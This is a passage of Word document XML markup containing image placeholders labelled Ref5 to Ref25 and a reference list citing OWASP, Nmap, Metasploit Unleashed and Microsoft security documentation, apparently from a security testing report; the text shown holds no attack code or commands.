    <w:p w:rsidR="00E67361" w:rsidRDefault="00E67361" w:rsidP="00E46162">
      <w:r>
        <w:t>Ref5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="280FF073" wp14:editId="06883044">
            <wp:extent cx="5486400" cy="2256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2256790"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E67361" w:rsidRDefault="00E67361" w:rsidP="00E46162"/>
    <w:p w:rsidR="00E67361" w:rsidRDefault="00E67361" w:rsidP="00E46162">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Ref6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31B054EE" wp14:editId="54B6F917">
            <wp:extent cx="5486400" cy="34055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405505"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E67361" w:rsidRDefault="00E67361" w:rsidP="00E46162"/>
    <w:p w:rsidR="00E67361" w:rsidRDefault="00E67361" w:rsidP="00E46162">
      <w:r>
        <w:t>Ref7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A7EBDE7" wp14:editId="3B47F287">
            <wp:extent cx="5486400" cy="1212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121285"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="003127D3" w:rsidRDefault="003127D3" w:rsidP="00E46162"/>
    <w:p w:rsidR="003127D3" w:rsidRDefault="003127D3" w:rsidP="00E46162">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Ref8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="522FF3F1" wp14:editId="14AE48A8">
            <wp:extent cx="5486400" cy="3133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133725"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="003127D3" w:rsidRDefault="003127D3" w:rsidP="00E46162"/>
    <w:p w:rsidR="003127D3" w:rsidRDefault="003127D3" w:rsidP="00E46162">
      <w:r>
        <w:t>Ref9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D262247" wp14:editId="3AFE0869">
            <wp:extent cx="5486400" cy="3149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14960"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="003127D3" w:rsidRDefault="003127D3" w:rsidP="00E46162"/>
    <w:p w:rsidR="003127D3" w:rsidRDefault="003127D3" w:rsidP="00E46162">
      <w:r>
        <w:t>Ref10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003127D3" w:rsidRDefault="003127D3" w:rsidP="00E46162">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E957F7C" wp14:editId="08487BA3">
            <wp:extent cx="3439005" cy="266737"/>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5.PNG"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3439005" cy="266737"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="003127D3" w:rsidRDefault="003127D3" w:rsidP="00E46162"/>
    <w:p w:rsidR="003127D3" w:rsidRDefault="003127D3" w:rsidP="00E46162">
      <w:r>
        <w:t>Ref11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5FBBC98B" wp14:editId="422FD594">
            <wp:extent cx="5486400" cy="727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727075"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="003127D3" w:rsidRDefault="003127D3" w:rsidP="00E46162"/>
    <w:p w:rsidR="003127D3" w:rsidRDefault="003127D3" w:rsidP="00E46162">
      <w:r>
        <w:t>Ref12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="402160D0" wp14:editId="5B8BE16E">
            <wp:extent cx="5486400" cy="2997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99720"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="003127D3" w:rsidRDefault="003127D3" w:rsidP="00E46162"/>
    <w:p w:rsidR="003127D3" w:rsidRDefault="003127D3" w:rsidP="00E46162">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Ref13</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="205418F2" wp14:editId="554DC98A">
            <wp:extent cx="5486400" cy="3620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620770"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="003127D3" w:rsidRDefault="003127D3" w:rsidP="00E46162"/>
    <w:p w:rsidR="003127D3" w:rsidRDefault="003127D3" w:rsidP="00E46162">
      <w:r>
        <w:t>Ref14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="243993DE" wp14:editId="4FEA723B">
            <wp:extent cx="5486400" cy="498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498475"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="003127D3" w:rsidRDefault="003127D3" w:rsidP="00E46162"/>
    <w:p w:rsidR="003127D3" w:rsidRDefault="003127D3" w:rsidP="00E46162">
      <w:r>
        <w:t>Ref15</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="702D1F51" wp14:editId="0E17571F">
            <wp:extent cx="5486400" cy="2260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26060"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="003127D3" w:rsidRDefault="003127D3" w:rsidP="00E46162"/>
    <w:p w:rsidR="003127D3" w:rsidRDefault="003127D3" w:rsidP="00E46162">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Ref16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3075FAEF" wp14:editId="39285EEB">
            <wp:extent cx="5486400" cy="18738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1873885"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="003127D3" w:rsidRDefault="003127D3" w:rsidP="00E46162"/>
    <w:p w:rsidR="003127D3" w:rsidRDefault="003127D3" w:rsidP="00E46162">
      <w:r>
        <w:t>Ref17</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5CCE2AC5" wp14:editId="6C4BB9C1">
            <wp:extent cx="5486400" cy="3219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8.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21945"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="003127D3" w:rsidRDefault="003127D3" w:rsidP="00E46162">
      <w:r>
        <w:t>Ref18</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003127D3" w:rsidRDefault="003127D3" w:rsidP="00E46162">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30221A6C" wp14:editId="275C7E13">
            <wp:extent cx="4067175" cy="3400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9.PNG"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4067759" cy="3400913"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="003127D3" w:rsidRDefault="003127D3" w:rsidP="00E46162"/>
    <w:p w:rsidR="003127D3" w:rsidRDefault="003127D3" w:rsidP="00E46162">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Ref19</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="225D5467" wp14:editId="717BC16A">
            <wp:extent cx="5486400" cy="12357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7.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1235710"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="003127D3" w:rsidRDefault="003127D3" w:rsidP="00E46162"/>
    <w:p w:rsidR="003127D3" w:rsidRDefault="003127D3" w:rsidP="00E46162">
      <w:r>
        <w:t>Ref20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33B80315" wp14:editId="355B14F8">
            <wp:extent cx="5486400" cy="26225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8.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622550"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="003127D3" w:rsidRDefault="003127D3" w:rsidP="00E46162"/>
    <w:p w:rsidR="003127D3" w:rsidRDefault="003127D3" w:rsidP="00E46162">
      <w:r>
        <w:t>Ref21</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003127D3" w:rsidRDefault="003127D3" w:rsidP="00E46162">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02404DDB" wp14:editId="77F78347">
            <wp:extent cx="4782217" cy="905001"/>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5.PNG"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4782217" cy="905001"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="003127D3" w:rsidRDefault="003127D3" w:rsidP="00E46162"/>
    <w:p w:rsidR="003127D3" w:rsidRDefault="003127D3" w:rsidP="00E46162">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Ref22</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D7427E3" wp14:editId="1C2B325E">
            <wp:extent cx="5486400" cy="12172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2.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1217295"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="003127D3" w:rsidRDefault="003127D3" w:rsidP="00E46162"/>
    <w:p w:rsidR="003127D3" w:rsidRDefault="003127D3" w:rsidP="00E46162">
      <w:r>
        <w:t>Ref23</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003127D3" w:rsidRDefault="003127D3" w:rsidP="00E46162">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40380036" wp14:editId="3F6CFD12">
            <wp:extent cx="5277587" cy="79068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1.PNG"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5277587" cy="790685"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="003127D3" w:rsidRDefault="003127D3" w:rsidP="00E46162"/>
    <w:p w:rsidR="003127D3" w:rsidRDefault="003127D3" w:rsidP="00E46162">
      <w:r>
        <w:t>Ref24</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003127D3" w:rsidRDefault="003127D3" w:rsidP="00E46162">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53357321" wp14:editId="448E9FCA">
            <wp:extent cx="5486400" cy="12750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0.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1275080"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00384C51" w:rsidRDefault="00384C51" w:rsidP="00E46162"/>
    <w:p w:rsidR="00384C51" w:rsidRDefault="00384C51" w:rsidP="00E46162">
      <w:r>
        <w:t>Ref25</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00384C51" w:rsidRDefault="00384C51" w:rsidP="00E46162">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E94EA51" wp14:editId="21EDE86A">
            <wp:extent cx="4648849" cy="11812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4.PNG"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId32">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4648849" cy="1181265"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D8148A" w:rsidRDefault="00D8148A" w:rsidP="00E46162"/>
    <w:p w:rsidR="00D8148A" w:rsidRDefault="00D8148A" w:rsidP="00E46162"/>
    <w:p w:rsidR="00D8148A" w:rsidRDefault="00D8148A" w:rsidP="00E46162"/>
    <w:p w:rsidR="00D8148A" w:rsidRDefault="00D8148A" w:rsidP="00D8148A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc2777739"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>5. References</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w:rsidR="00D8148A" w:rsidRDefault="00D8148A" w:rsidP="00D8148A"/>
    <w:p w:rsidR="00D8148A" w:rsidRDefault="00D8148A" w:rsidP="00D8148A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="212529"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D8148A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="212529"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>Owasporg. 2019. Owasporg.</w:t>
      </w:r>
      <w:r w:rsidR="00454BA1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="212529"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t> [Online]. [5</w:t>
      </w:r>
      <w:r w:rsidRPr="00D8148A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="212529"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> March 2019]. Available from: </w:t>
      </w:r>
      <w:hyperlink r:id="rId33" w:history="1">
        <w:r w:rsidRPr="00A52634">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
          </w:rPr>
          <w:t>https://www.owasp.org/images/1/19/OTGv4.pdf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00454BA1" w:rsidRDefault="00454BA1" w:rsidP="00D8148A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Nmaporg. 2019. Nmaporg. [Online]. [5 March 2019]. Available from: https://nmap.org/docs/discovery.pdf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D8148A" w:rsidRDefault="00D8148A" w:rsidP="00D8148A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Offensive-securitycom. 2019. Offensive-securitycom. [Online]. </w:t>
      </w:r>
      <w:r w:rsidR="00454BA1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>[5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> March 2019]. Available from: </w:t>
      </w:r>
      <w:hyperlink r:id="rId34" w:history="1">
        <w:r w:rsidR="00454BA1" w:rsidRPr="00A52634">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>https://www.offensive-security.com/metasploit-unleashed/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00454BA1" w:rsidRPr="00D8148A" w:rsidRDefault="00454BA1" w:rsidP="00D8148A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="212529"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Dansimp. 2019. Microsoftcom. [Online]. [5 March 2019]. Available from: https://docs.microsoft.com/en-us/windows/security/threat-protection/</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00454BA1" w:rsidRPr="00D8148A">
      <w:footerReference w:type="default" r:id="rId3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0C12" w:rsidRDefault="00800C12" w:rsidP="00C6554A">
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00800C12" w:rsidRDefault="00800C12"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7361" w:rsidRDefault="00E67361">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
    </w:pPr>
    <w:r>
      <w:t xml:space="preserve">Page </w:t>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:instrText xml:space="preserve"> PAGE  \* Arabic  \* MERGEFORMAT </w:instrText>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="005E20CC">
      <w:rPr>
        <w:noProof/>
      </w:rP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0C12" w:rsidRDefault="00800C12" w:rsidP="00C6554A">
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00800C12" w:rsidRDefault="00800C12"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8FB0F0C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="06CAC0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474C29"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="61A210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59260E9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3C5AD0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8753232"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5330E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C3E4893"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F5B49B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FE03D92"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9CCE2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1D82F90"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EB4C54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50F2ACC"/>
